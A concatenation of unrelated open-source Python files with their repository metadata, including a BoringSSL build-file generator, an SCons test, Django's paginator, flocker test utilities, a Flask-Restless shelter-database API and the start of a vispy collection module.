        ops.extend(ExtractPerlAsmFromCMakeFile(cmakefile))
    return ops
def PerlAsm(output_filename, input_filename, perlasm_style, extra_args):
    """Runs a perlasm script and puts the output into output_filename."""
    out_dir = os.path.dirname(output_filename)
    if not os.path.isdir(out_dir):
        os.makedirs(out_dir)
    # perlasm scripts take the target "style" plus any extra flags and emit
    # the generated assembly on stdout.
    generated = subprocess.check_output(
        ['perl', input_filename, perlasm_style] + extra_args)
    with open(output_filename, 'w+') as out_file:
        out_file.write(generated)
def ArchForAsmFilename(filename):
    """Returns the list of architectures a given asm file should be compiled
    for, inferred from substrings of |filename|. Raises ValueError when no
    known architecture marker is present."""
    # Order matters: more specific markers are checked first.
    if 'x86_64' in filename or 'avx2' in filename:
        return ['x86_64']
    if ('x86' in filename and 'x86_64' not in filename) or '586' in filename:
        return ['x86']
    if 'armx' in filename:
        return ['arm', 'aarch64']
    if 'armv8' in filename:
        return ['aarch64']
    if 'arm' in filename:
        return ['arm']
    raise ValueError('Unknown arch for asm filename: ' + filename)
def WriteAsmFiles(perlasms):
    """Generates asm files from perlasm directives for each supported OS x
    platform combination.

    Returns a dict mapping (osname, arch) to the list of asm file paths
    (generated plus hand-written) for that combination.
    """
    asmfiles = {}
    for osarch in OS_ARCH_COMBOS:
        (osname, arch, perlasm_style, extra_args, asm_ext) = osarch
        key = (osname, arch)
        # Generated output for e.g. ("linux", "x86_64") lives under "linux-x86_64".
        outDir = '%s-%s' % key
        for perlasm in perlasms:
            filename = os.path.basename(perlasm['input'])
            output = perlasm['output']
            if not output.startswith('src'):
                raise ValueError('output missing src: %s' % output)
            # Mirror the src/ tree layout under the per-OS/arch directory.
            output = os.path.join(outDir, output[4:])
            output = output.replace('${ASM_EXT}', asm_ext)
            # Only run perlasm for files matching this architecture.
            if arch in ArchForAsmFilename(filename):
                PerlAsm(output, perlasm['input'], perlasm_style,
                        perlasm['extra_args'] + extra_args)
                asmfiles.setdefault(key, []).append(output)
    # Some asm files are hand-written rather than generated from perlasm.
    # NOTE: dict.iteritems() makes this function Python-2-only.
    for (key, non_perl_asm_files) in NON_PERL_FILES.iteritems():
        asmfiles.setdefault(key, []).extend(non_perl_asm_files)
    return asmfiles
def PrintVariableSection(out, name, files):
    """Writes one gyp variable assignment named |name| to |out|, listing
    |files| in sorted order."""
    out.write(" '{}': [\n".format(name))
    for entry in sorted(files):
        out.write(" '{}',\n".format(entry))
    out.write(' ],\n')
def main():
    """Regenerates boringssl.gypi and boringssl_tests.gypi from src/.

    Collects C sources, generates err_data.c via the Go generator, runs all
    perlasm scripts per OS/arch, and emits one gyp target per test binary.
    Returns 0 on success (used as the process exit status).
    """
    crypto_c_files = FindCFiles(os.path.join('src', 'crypto'), NoTests)
    ssl_c_files = FindCFiles(os.path.join('src', 'ssl'), NoTests)
    # Generate err_data.c
    with open('err_data.c', 'w+') as err_data:
        subprocess.check_call(['go', 'run', 'err_data_generate.go'],
                              cwd=os.path.join('src', 'crypto', 'err'),
                              stdout=err_data)
    crypto_c_files.append('err_data.c')
    with open('boringssl.gypi', 'w+') as gypi:
        gypi.write(FILE_HEADER + '{\n \'variables\': {\n')
        PrintVariableSection(
            gypi, 'boringssl_lib_sources', crypto_c_files + ssl_c_files)
        # One source-list variable per (OS, arch) combination; sorted for
        # deterministic output. NOTE: iteritems() makes this Python-2-only.
        perlasms = ReadPerlAsmOperations()
        for ((osname, arch), asm_files) in sorted(
                WriteAsmFiles(perlasms).iteritems()):
            PrintVariableSection(gypi, 'boringssl_%s_%s_sources' %
                                 (osname, arch), asm_files)
        gypi.write(' }\n}\n')
    test_c_files = FindCFiles(os.path.join('src', 'crypto'), OnlyTests)
    test_c_files += FindCFiles(os.path.join('src', 'ssl'), OnlyTests)
    with open('boringssl_tests.gypi', 'w+') as test_gypi:
        test_gypi.write(FILE_HEADER + '{\n \'targets\': [\n')
        test_names = []
        # Emit one executable gyp target per *_test.c file.
        for test in sorted(test_c_files):
            test_name = 'boringssl_%s' % os.path.splitext(os.path.basename(test))[0]
            test_gypi.write(""" {
'target_name': '%s',
'type': 'executable',
'dependencies': [
'boringssl.gyp:boringssl',
],
'sources': [
'%s',
],
# TODO(davidben): Fix size_t truncations in BoringSSL.
# https://crbug.com/429039
'msvs_disabled_warnings': [ 4267, ],
},\n""" % (test_name, test))
            test_names.append(test_name)
        test_names.sort()
        # Trailing variable listing every test target name.
        test_gypi.write(""" ],
'variables': {
'boringssl_test_targets': [\n""")
        for test in test_names:
            test_gypi.write(""" '%s',\n""" % test)
        test_gypi.write(' ],\n }\n}\n')
    return 0
# Script entry point: regenerate the gypi files and exit with main()'s status.
if __name__ == '__main__':
    sys.exit(main())
|
{
"content_hash": "2122af20a0bf4df284648801b324b7ff",
"timestamp": "",
"source": "github",
"line_count": 253,
"max_line_length": 80,
"avg_line_length": 30.537549407114625,
"alnum_prop": 0.6242557597721978,
"repo_name": "chinmaygarde/mojo",
"id": "18356958fa39b57bdeac15b57c99a55a68b9710e",
"size": "7888",
"binary": false,
"copies": "6",
"ref": "refs/heads/ios",
"path": "third_party/boringssl/update_gypi_and_asm.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "1880713"
},
{
"name": "C++",
"bytes": "35838874"
},
{
"name": "Dart",
"bytes": "969667"
},
{
"name": "Go",
"bytes": "186519"
},
{
"name": "Groff",
"bytes": "29030"
},
{
"name": "HTML",
"bytes": "41854"
},
{
"name": "Java",
"bytes": "1274683"
},
{
"name": "JavaScript",
"bytes": "208100"
},
{
"name": "Makefile",
"bytes": "402"
},
{
"name": "Objective-C",
"bytes": "75638"
},
{
"name": "Objective-C++",
"bytes": "408801"
},
{
"name": "Protocol Buffer",
"bytes": "1048"
},
{
"name": "Python",
"bytes": "5645880"
},
{
"name": "Shell",
"bytes": "148167"
},
{
"name": "Yacc",
"bytes": "31141"
},
{
"name": "nesC",
"bytes": "18347"
}
],
"symlink_target": ""
}
|
#!/usr/bin/env python
#
# __COPYRIGHT__
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "__FILE__ __REVISION__ __DATE__ __DEVELOPER__"
"""
Test that the $JAVAHCOMSTR construction variable allows you to configure
the javah output.
"""
import os.path

import TestSCons

_python_ = TestSCons._python_

test = TestSCons.TestSCons()

test.subdir('src')

# Expected generated-header paths, interpolated into the expected stdout below.
out_file1_h = os.path.join('out', 'file1.h')
out_file2_h = os.path.join('out', 'file2.h')
out_file3_h = os.path.join('out', 'file3.h')

# Fake "javah" tool: copies each input to the target, dropping any literal
# "/*javah*/" marker lines, so the results are trivial to verify.
test.write('myjavah.py', r"""
import sys
outfile = open(sys.argv[1], 'wb')
for f in sys.argv[2:]:
infile = open(f, 'rb')
for l in filter(lambda l: l != '/*javah*/\n', infile.readlines()):
outfile.write(l)
sys.exit(0)
""")

# JAVAHCOM runs the fake tool; JAVAHCOMSTR is the display string under test.
test.write('SConstruct', """
env = Environment(TOOLS = ['default', 'javah'],
JAVAHCOM = r'%(_python_)s myjavah.py $TARGET $SOURCES',
JAVAHCOMSTR = 'Building javah $TARGET from $SOURCES')
env.JavaH(target = 'out', source = 'file1.class')
env.JavaH(target = 'out', source = 'file2.class')
env.JavaH(target = 'out', source = 'file3.class')
""" % locals())

test.write('file1.class', "file1.class\n/*javah*/\n")
test.write('file2.class', "file2.class\n/*javah*/\n")
test.write('file3.class', "file3.class\n/*javah*/\n")

# The build output must show the customized JAVAHCOMSTR lines, not the
# default command echo.
test.run(stdout = test.wrap_stdout("""\
Building javah %(out_file1_h)s from file1.class
Building javah %(out_file2_h)s from file2.class
Building javah %(out_file3_h)s from file3.class
""" % locals()))

# Each generated header is the class file minus the marker line.
test.must_match(['out', 'file1.h'], "file1.class\n")
test.must_match(['out', 'file2.h'], "file2.class\n")
test.must_match(['out', 'file3.h'], "file3.class\n")

test.pass_test()
|
{
"content_hash": "e180670c48e808cf23ae487789b5b021",
"timestamp": "",
"source": "github",
"line_count": 85,
"max_line_length": 73,
"avg_line_length": 31.68235294117647,
"alnum_prop": 0.6910508726327516,
"repo_name": "datalogics-robb/scons",
"id": "8ee57670b40fb0229c821bb2209c2b56270fdc4b",
"size": "2693",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "test/Java/JAVAHCOMSTR.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "43855"
},
{
"name": "Perl",
"bytes": "23384"
},
{
"name": "Python",
"bytes": "4753658"
},
{
"name": "Shell",
"bytes": "25935"
}
],
"symlink_target": ""
}
|
import collections
import collections.abc
import warnings
from math import ceil

from django.utils.functional import cached_property
from django.utils.translation import gettext_lazy as _
class UnorderedObjectListWarning(RuntimeWarning):
    """Warns that paginating an unordered object_list may give inconsistent results."""
    pass


class InvalidPage(Exception):
    """Base class for all invalid-page errors raised by ``Paginator``."""
    pass


class PageNotAnInteger(InvalidPage):
    """The requested page number could not be converted to an integer."""
    pass


class EmptyPage(InvalidPage):
    """The requested page contains no results."""
    pass
class Paginator:
    """Split ``object_list`` into pages of ``per_page`` objects.

    ``orphans`` objects or fewer left over after the last full page are
    absorbed into that page instead of forming a tiny final page.
    """

    def __init__(self, object_list, per_page, orphans=0,
                 allow_empty_first_page=True):
        self.object_list = object_list
        self._check_object_list_is_ordered()
        self.per_page = int(per_page)
        self.orphans = int(orphans)
        self.allow_empty_first_page = allow_empty_first_page

    def validate_number(self, number):
        """Validate the given 1-based page number."""
        try:
            number = int(number)
        except (TypeError, ValueError):
            raise PageNotAnInteger(_('That page number is not an integer'))
        if number < 1:
            raise EmptyPage(_('That page number is less than 1'))
        # An out-of-range request is tolerated only for an allowed empty
        # first page.
        if number > self.num_pages and not (
                number == 1 and self.allow_empty_first_page):
            raise EmptyPage(_('That page contains no results'))
        return number

    def get_page(self, number):
        """
        Return a valid page, even if the page argument isn't a number or isn't
        in range.
        """
        try:
            number = self.validate_number(number)
        except PageNotAnInteger:
            number = 1
        except EmptyPage:
            number = self.num_pages
        return self.page(number)

    def page(self, number):
        """Return a Page object for the given 1-based page number."""
        number = self.validate_number(number)
        start = (number - 1) * self.per_page
        end = start + self.per_page
        # Fold trailing orphans into the last page.
        if end + self.orphans >= self.count:
            end = self.count
        return self._get_page(self.object_list[start:end], number, self)

    def _get_page(self, *args, **kwargs):
        """
        Return an instance of a single page.

        This hook can be used by subclasses to use an alternative to the
        standard :cls:`Page` object.
        """
        return Page(*args, **kwargs)

    @cached_property
    def count(self):
        """Return the total number of objects, across all pages."""
        try:
            # QuerySet-like objects expose a no-argument count().
            return self.object_list.count()
        except (AttributeError, TypeError):
            # AttributeError: no count() method at all.
            # TypeError: count() requires arguments (e.g. list.count).
            return len(self.object_list)

    @cached_property
    def num_pages(self):
        """Return the total number of pages."""
        if self.count == 0 and not self.allow_empty_first_page:
            return 0
        effective = max(1, self.count - self.orphans)
        return int(ceil(effective / float(self.per_page)))

    @property
    def page_range(self):
        """
        Return a 1-based range of pages for iterating through within
        a template for loop.
        """
        return range(1, self.num_pages + 1)

    def _check_object_list_is_ordered(self):
        """
        Warn if self.object_list is unordered (typically a QuerySet).
        """
        ordered = getattr(self.object_list, 'ordered', None)
        if ordered is None or ordered:
            return
        if hasattr(self.object_list, 'model'):
            obj_list_repr = '{} {}'.format(
                self.object_list.model, self.object_list.__class__.__name__)
        else:
            obj_list_repr = '{!r}'.format(self.object_list)
        warnings.warn(
            'Pagination may yield inconsistent results with an unordered '
            'object_list: {}.'.format(obj_list_repr),
            UnorderedObjectListWarning,
            stacklevel=3
        )
# Alias kept so code importing the old name continues to work.
QuerySetPaginator = Paginator  # For backwards-compatibility.
# Base on collections.abc.Sequence: the bare collections.Sequence alias was
# deprecated since Python 3.3 and removed in Python 3.10.
class Page(collections.abc.Sequence):
    """
    A single page of results produced by ``Paginator.page()``.

    Behaves as a read-only sequence of the objects on the page.
    """

    def __init__(self, object_list, number, paginator):
        self.object_list = object_list
        self.number = number
        self.paginator = paginator

    def __repr__(self):
        return '<Page %s of %s>' % (self.number, self.paginator.num_pages)

    def __len__(self):
        return len(self.object_list)

    def __getitem__(self, index):
        if not isinstance(index, (int, slice)):
            raise TypeError
        # The object_list is converted to a list so that if it was a QuerySet
        # it won't be a database hit per __getitem__.
        if not isinstance(self.object_list, list):
            self.object_list = list(self.object_list)
        return self.object_list[index]

    def has_next(self):
        """Return True if there is a page after this one."""
        return self.number < self.paginator.num_pages

    def has_previous(self):
        """Return True if there is a page before this one."""
        return self.number > 1

    def has_other_pages(self):
        """Return True if this is not the only page."""
        return self.has_previous() or self.has_next()

    def next_page_number(self):
        """Return the validated number of the following page."""
        return self.paginator.validate_number(self.number + 1)

    def previous_page_number(self):
        """Return the validated number of the preceding page."""
        return self.paginator.validate_number(self.number - 1)

    def start_index(self):
        """
        Return the 1-based index of the first object on this page,
        relative to total objects in the paginator.
        """
        # Special case, return zero if no items.
        if self.paginator.count == 0:
            return 0
        return (self.paginator.per_page * (self.number - 1)) + 1

    def end_index(self):
        """
        Return the 1-based index of the last object on this page,
        relative to total objects found (hits).
        """
        # Special case for the last page because there can be orphans.
        if self.number == self.paginator.num_pages:
            return self.paginator.count
        return self.number * self.paginator.per_page
|
{
"content_hash": "8097b128907f6f141200217efd740e51",
"timestamp": "",
"source": "github",
"line_count": 185,
"max_line_length": 91,
"avg_line_length": 31.805405405405406,
"alnum_prop": 0.592794017675051,
"repo_name": "elky/django",
"id": "b07be513d39def3c7132aed0de241192caaf1f83",
"size": "5884",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "django/core/paginator.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "55975"
},
{
"name": "HTML",
"bytes": "219349"
},
{
"name": "JavaScript",
"bytes": "252940"
},
{
"name": "Makefile",
"bytes": "125"
},
{
"name": "Python",
"bytes": "12100085"
},
{
"name": "Shell",
"bytes": "809"
},
{
"name": "Smarty",
"bytes": "130"
}
],
"symlink_target": ""
}
|
"""
Testing utilities for ``flocker.node``.
"""
import os
import pwd
import socket
from unittest import skipIf
from contextlib import closing
from uuid import uuid4
from zope.interface import implementer
from characteristic import attributes
from twisted.trial.unittest import TestCase
from twisted.internet.defer import succeed
from zope.interface.verify import verifyObject
from eliot import Logger, ActionType
from ._docker import BASE_DOCKER_API_URL
from . import IDeployer, IStateChange, sequentially
from ..testtools import loop_until
from ..control import (
IClusterStateChange, Node, NodeState, Deployment, DeploymentState)
from ..control._model import ip_to_uuid
# Filesystem path portion of the Docker API URL.
# NOTE(review): assumes BASE_DOCKER_API_URL looks like "unix://<path>" so that
# splitting on ':/' leaves the socket path last — confirm against _docker.
DOCKER_SOCKET_PATH = BASE_DOCKER_API_URL.split(':/')[-1]
def docker_accessible():
    """
    Attempt to connect to the Docker control socket.

    This may address https://clusterhq.atlassian.net/browse/FLOC-85.

    :return: A ``bytes`` string describing the reason Docker is not
        accessible or ``None`` if it appears to be accessible.
    """
    probe = socket.socket(family=socket.AF_UNIX)
    try:
        probe.connect(DOCKER_SOCKET_PATH)
    except socket.error as e:
        return os.strerror(e.errno)
    finally:
        probe.close()
    return None
# Probe Docker once at import time; the result is baked into the decorator.
_docker_reason = docker_accessible()

# Decorator for tests requiring a reachable Docker daemon; skips with a
# message naming the current user and socket path when Docker is unavailable.
if_docker_configured = skipIf(
    _docker_reason,
    "User {!r} cannot access Docker via {!r}: {}".format(
        pwd.getpwuid(os.geteuid()).pw_name,
        DOCKER_SOCKET_PATH,
        _docker_reason,
    ))
def wait_for_unit_state(docker_client, unit_name, expected_activation_states):
    """
    Wait until a unit is in the requested state.

    :param docker_client: A ``DockerClient`` instance.
    :param unicode unit_name: The name of the unit.
    :param expected_activation_states: Activation states to wait for.

    :return: ``Deferred`` that fires when required state has been reached.
    """
    def _state_reached(units):
        # Truthy once the named unit reports one of the wanted states.
        return any(
            unit.name == unit_name and
            unit.activation_state in expected_activation_states
            for unit in units)

    def _poll():
        listing = docker_client.list()
        listing.addCallback(_state_reached)
        return listing

    return loop_until(_poll)
# Eliot action type used for logging runs of ControllableAction in tests.
CONTROLLABLE_ACTION_TYPE = ActionType(u"test:controllableaction", [], [])


@implementer(IStateChange)
@attributes(['result'])
class ControllableAction(object):
    """
    ``IStateChange`` whose results can be controlled.

    The ``result`` attribute (added by ``@attributes``) is returned verbatim
    from ``run``, so tests can script the outcome.
    """
    # Set to True once run() has been invoked.
    called = False

    # The deployer passed to the most recent run() call.
    deployer = None

    _logger = Logger()

    @property
    def eliot_action(self):
        return CONTROLLABLE_ACTION_TYPE(self._logger)

    def run(self, deployer):
        # Record the invocation so tests can assert on it, then return the
        # preconfigured result.
        self.called = True
        self.deployer = deployer
        return self.result
@implementer(IDeployer)
class DummyDeployer(object):
    """
    A non-implementation of ``IDeployer``.
    """
    hostname = u"127.0.0.1"
    # Fixed random UUID, chosen once at import time and shared by instances.
    node_uuid = uuid4()

    def discover_state(self, node_stat):
        # No local state to report: fire immediately with an empty tuple.
        return succeed(())

    def calculate_changes(self, desired_configuration, cluster_state):
        # Never proposes any changes.
        return sequentially(changes=[])
@implementer(IDeployer)
class ControllableDeployer(object):
    """
    ``IDeployer`` whose results can be controlled.

    ``local_states`` and ``calculated_actions`` are queues consumed one entry
    per call to ``discover_state`` / ``calculate_changes`` respectively, so a
    test can script successive results.
    """
    def __init__(self, hostname, local_states, calculated_actions):
        self.node_uuid = ip_to_uuid(hostname)
        self.hostname = hostname
        # Deferreds to return, one per discover_state() call.
        self.local_states = local_states
        # Results to return, one per calculate_changes() call.
        self.calculated_actions = calculated_actions
        # Records (local node, desired config, cluster state) per call,
        # for later inspection by tests.
        self.calculate_inputs = []

    def discover_state(self, node_state):
        # Pop the next scripted state and wrap the value in a one-tuple.
        return self.local_states.pop(0).addCallback(lambda val: (val,))

    def calculate_changes(self, desired_configuration, cluster_state):
        self.calculate_inputs.append(
            (cluster_state.get_node(uuid=self.node_uuid,
                                    hostname=self.hostname),
             desired_configuration, cluster_state))
        return self.calculated_actions.pop(0)
# A deployment with no information:
EMPTY = Deployment(nodes=[])
# Cluster state with no known nodes or datasets.
EMPTY_STATE = DeploymentState()
def ideployer_tests_factory(fixture):
    """
    Create test case for IDeployer implementation.

    :param fixture: Callable that takes ``TestCase`` instance and returns
         a ``IDeployer`` provider.

    :return: ``TestCase`` subclass that will test the given fixture.
    """
    class IDeployerTests(TestCase):
        """
        Tests for ``IDeployer``.
        """
        def test_interface(self):
            """
            The object claims to provide the interface.
            """
            self.assertTrue(verifyObject(IDeployer, fixture(self)))

        def _discover_state(self):
            """
            Create a deployer using the fixture and ask it to discover state.

            :return: The return value of the object's ``discover_state``
                method.
            """
            deployer = fixture(self)
            result = deployer.discover_state(NodeState(hostname=b"10.0.0.1"))
            return result

        def test_discover_state_list_result(self):
            """
            The object's ``discover_state`` method returns a ``Deferred`` that
            fires with a ``list``.
            """
            def discovered(changes):
                # NOTE(review): asserts tuple although the docstring says
                # "list" — implementations here return tuples.
                self.assertEqual(tuple, type(changes))
            return self._discover_state().addCallback(discovered)

        def test_discover_state_iclusterstatechange(self):
            """
            The elements of the ``list`` that ``discover_state``\ 's
            ``Deferred`` fires with provide ``IClusterStateChange``.
            """
            def discovered(changes):
                # Collect offenders so the failure message lists them all.
                wrong = []
                for obj in changes:
                    if not IClusterStateChange.providedBy(obj):
                        wrong.append(obj)
                if wrong:
                    template = (
                        "Some elements did not provide IClusterStateChange: {}"
                    )
                    self.fail(template.format(wrong))
            return self._discover_state().addCallback(discovered)

        def test_calculate_necessary_state_changes(self):
            """
            The object's ``calculate_necessary_state_changes`` method returns a
            ``IStateChange`` provider.
            """
            deployer = fixture(self)
            result = deployer.calculate_changes(EMPTY, EMPTY_STATE)
            self.assertTrue(verifyObject(IStateChange, result))

    return IDeployerTests
def to_node(node_state):
    """
    Convert a ``NodeState`` to a corresponding ``Node``.

    :param NodeState node_state: Object to convert.
    :return Node: Equivalent node.
    """
    # Missing applications/manifestations are normalized to empty containers.
    applications = node_state.applications or []
    manifestations = node_state.manifestations or {}
    return Node(uuid=node_state.uuid, hostname=node_state.hostname,
                applications=applications, manifestations=manifestations)
def assert_calculated_changes_for_deployer(
    case, deployer, node_state, node_config, nonmanifest_datasets,
    additional_node_states, additional_node_config, expected_changes
):
    """
    Assert that ``calculate_changes`` returns certain changes when it is
    invoked with the given state and configuration.

    :param TestCase case: The ``TestCase`` to use to make assertions (typically
        the one being run at the moment).
    :param IDeployer deployer: The deployer provider which will be asked to
        calculate the changes.
    :param NodeState node_state: The deployer will be asked to calculate
        changes for a node that has this state.
    :param Node node_config: The deployer will be asked to calculate changes
        for a node with this desired configuration.
    :param set nonmanifest_datasets: Datasets which will be presented as part
        of the cluster state without manifestations on any node.
    :param set additional_node_states: A set of ``NodeState`` for other nodes.
    :param set additional_node_config: A set of ``Node`` for other nodes.
    :param expected_changes: The ``IStateChange`` expected to be returned.
    """
    # Index the non-manifest datasets by id, as DeploymentState expects.
    nonmanifest = {
        dataset.dataset_id: dataset for dataset in nonmanifest_datasets
    }
    state = DeploymentState(
        nodes={node_state} | additional_node_states,
        nonmanifest_datasets=nonmanifest,
    )
    config = Deployment(nodes={node_config} | additional_node_config)
    actual = deployer.calculate_changes(config, state)
    case.assertEqual(expected_changes, actual)
|
{
"content_hash": "8f0a516bc3587ce609e62266f273a097",
"timestamp": "",
"source": "github",
"line_count": 266,
"max_line_length": 79,
"avg_line_length": 32.19548872180451,
"alnum_prop": 0.6387202241943017,
"repo_name": "1d4Nf6/flocker",
"id": "7158690e9aedd5430b05d4ba38dd170b5938da59",
"size": "8626",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "flocker/node/testtools.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "2442948"
},
{
"name": "Ruby",
"bytes": "6401"
},
{
"name": "Shell",
"bytes": "3418"
}
],
"symlink_target": ""
}
|
# ***** BEGIN LICENSE BLOCK *****
# This file is part of Shelter Database.
# Copyright (c) 2016
# All rights reserved.
#
#
#
# ***** END LICENSE BLOCK *****
from bootstrap import app, manager
from web import models
from web import processors
# Flask-Restless blueprints exposing the shelter-database models as a REST
# API. Each create_api_blueprint call wires CRUD endpoints for one model;
# preprocessors enforce authentication and request massaging.

# 'User' Web service
# NOTE(review): POST uses shelter_POST_preprocessor here — looks copy-pasted
# from the Shelter blueprint below; confirm this is intended for User.
blueprint_user = manager.create_api_blueprint(models.User,
        exclude_columns=['pwdhash'],
        methods=['GET', 'POST', 'PUT', 'DELETE'],
        preprocessors=dict(
            GET_SINGLE=[processors.auth_func],
            GET_MANY=[processors.auth_func],
            POST=[processors.auth_func,
                  processors.shelter_POST_preprocessor],
            DELETE=[processors.auth_func]))

# 'Shelter' Web service
# Hides the owning user's credentials and email from responses.
blueprint_shelter = manager.create_api_blueprint(models.Shelter,
        exclude_columns=['user_id', 'responsible.pwdhash',
                         'responsible.email'],
        methods=['GET', 'POST', 'PUT', 'DELETE'],
        preprocessors=dict(
            POST=[processors.auth_func,
                  processors.shelter_POST_preprocessor],
            DELETE=[processors.auth_func]))

# 'ShelterPicture' Web service
blueprint_shelter_picture = manager.create_api_blueprint(models.ShelterPicture,
        methods=['GET', 'POST', 'PUT', 'DELETE'])

# 'Section' Web service
blueprint_section = manager.create_api_blueprint(models.Section,
        methods=['GET', 'POST', 'PUT', 'DELETE'])

# 'Category' Web service
blueprint_category = manager.create_api_blueprint(models.Category,
        methods=['GET', 'POST', 'PUT', 'DELETE'])

# 'Attribute' Web service
# The huge results_per_page values effectively disable pagination.
blueprint_attribute = manager.create_api_blueprint(models.Attribute,
        methods=['GET', 'POST', 'PUT', 'DELETE'],
        results_per_page = 10000000,
        max_results_per_page = 10000000)

# 'AttributePicture' Web service
blueprint_attribute_picture = manager.create_api_blueprint(models.AttributePicture,
        methods=['GET', 'POST', 'PUT', 'DELETE'])

# 'Value' Web service
blueprint_value = manager.create_api_blueprint(models.Value,
        methods=['GET', 'POST', 'PUT', 'DELETE'],
        preprocessors=dict(
            PUT_SINGLE=[processors.value_edit_preprocessor],
            PUT_MANY=[processors.value_edit_preprocessor]
            ))

# 'Property' Web service
# Pagination disabled as for Attribute; writes require authentication.
blueprint_property = manager.create_api_blueprint(models.Property,
        methods=['GET', 'POST', 'PUT', 'PATCH', 'DELETE'],
        results_per_page = 10000000,
        max_results_per_page = 10000000,
        preprocessors=dict(
            POST=[processors.auth_func,
                  processors.property_preprocessor],
            PUT=[processors.auth_func,
                 processors.property_preprocessor],
            DELETE=[processors.auth_func]))

# 'Page' Web service
blueprint_page = manager.create_api_blueprint(models.Page,
        methods=['GET', 'POST', 'PUT', 'PATCH', 'DELETE'])

# 'Translation' Web service
blueprint_translation = manager.create_api_blueprint(models.Translation,
        methods=['GET', 'POST', 'PUT', 'PATCH', 'DELETE'])
|
{
"content_hash": "dd59b4ac63ef5a2923bb6090eb935f01",
"timestamp": "",
"source": "github",
"line_count": 96,
"max_line_length": 83,
"avg_line_length": 37.791666666666664,
"alnum_prop": 0.5275633958103638,
"repo_name": "toggle-corp/shelter-database",
"id": "f06f0e9489e8faa9c175fabe55d2245ed5c3da68",
"size": "3676",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "src/web/views/api/shelter_api_v01.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "215790"
},
{
"name": "HTML",
"bytes": "340201"
},
{
"name": "JavaScript",
"bytes": "502358"
},
{
"name": "Mako",
"bytes": "494"
},
{
"name": "Python",
"bytes": "167958"
},
{
"name": "Shell",
"bytes": "1944"
}
],
"symlink_target": ""
}
|
"""
A collection is a container for several (optionally indexed) objects having
the same vertex structure (vtype) and same uniforms type (utype). A collection
allows to manipulate objects individually and each object can have its own set
of uniforms provided they are a combination of floats.
"""
import math
import numpy as np
from ...gloo import Texture2D, VertexBuffer, IndexBuffer
from . util import dtype_reduce
from . array_list import ArrayList
def next_power_of_2(n):
    """ Return next power of 2 greater than or equal to n (minimum 4) """
    # (n - 1).bit_length() is the exponent of the smallest power of two
    # that is >= n (for n >= 1); the result is clamped to at least 4.
    return max(4, 1 << (n - 1).bit_length())
class Item(object):
"""
An item represent an object within a collection and is created on demand
when accessing a specific object of the collection.
"""
def __init__(self, parent, key, vertices, indices, uniforms):
"""
Create an item from an existing collection.
Parameters
----------
parent : Collection
Collection this item belongs to
key : int
Collection index of this item
vertices: array-like
Vertices of the item
indices: array-like
Indices of the item
uniforms: array-like
Uniform parameters of the item
"""
self._parent = parent
self._key = key
self._vertices = vertices
self._indices = indices
self._uniforms = uniforms
@property
def vertices(self):
return self._vertices
@vertices.setter
def vertices(self, data):
self._vertices[...] = np.array(data)
@property
def indices(self):
return self._indices
@indices.setter
def indices(self, data):
if self._indices is None:
raise ValueError("Item has no indices")
start = self._parent.vertices._items[self._key][0]
self._indices[...] = np.array(data) + start
@property
def uniforms(self):
return self._uniforms
@uniforms.setter
def uniforms(self, data):
if self._uniforms is None:
raise ValueError("Item has no associated uniform")
self._uniforms[...] = data
def __getitem__(self, key):
""" Get a specific uniforms value """
if key in self._vertices.dtype.names:
return self._vertices[key]
elif key in self._uniforms.dtype.names:
return self._uniforms[key]
else:
raise IndexError("Unknown key ('%s')" % key)
def __setitem__(self, key, value):
""" Set a specific uniforms value """
if key in self._vertices.dtype.names:
self._vertices[key] = value
elif key in self._uniforms.dtype.names:
self._uniforms[key] = value
else:
raise IndexError("Unknown key")
def __str__(self):
return "Item (%s, %s, %s)" % (self._vertices,
self._indices,
self._uniforms)
class BaseCollection(object):
def __init__(self, vtype, utype=None, itype=None):
    """Build an empty collection backing store.

    :param vtype: structured dtype describing one vertex (mandatory).
    :param utype: optional structured dtype for per-item uniforms; must
        reduce to float32 fields only (they are packed into a texture).
    :param itype: optional unsigned-integer dtype for vertex indices.
    """
    # Vertices and type (mandatory)
    self._vertices_list = None
    self._vertices_buffer = None
    # Vertex indices and type (optional)
    self._indices_list = None
    self._indices_buffer = None
    # Uniforms and type (optional)
    self._uniforms_list = None
    self._uniforms_texture = None
    # Make sure types are np.dtype (or None)
    vtype = np.dtype(vtype) if vtype is not None else None
    itype = np.dtype(itype) if itype is not None else None
    utype = np.dtype(utype) if utype is not None else None
    # Vertices type (mandatory)
    # -------------------------
    if vtype.names is None:
        raise ValueError("vtype must be a structured dtype")
    # Indices type (optional)
    # -----------------------
    if itype is not None:
        if itype not in [np.uint8, np.uint16, np.uint32]:
            raise ValueError("itype must be unsigned integer or None")
        self._indices_list = ArrayList(dtype=itype)
    # No program yet
    self._programs = []
    # Need to update buffers & texture
    self._need_update = True
    # Uniforms type (optional)
    # -------------------------
    if utype is not None:
        if utype.names is None:
            raise ValueError("utype must be a structured dtype")
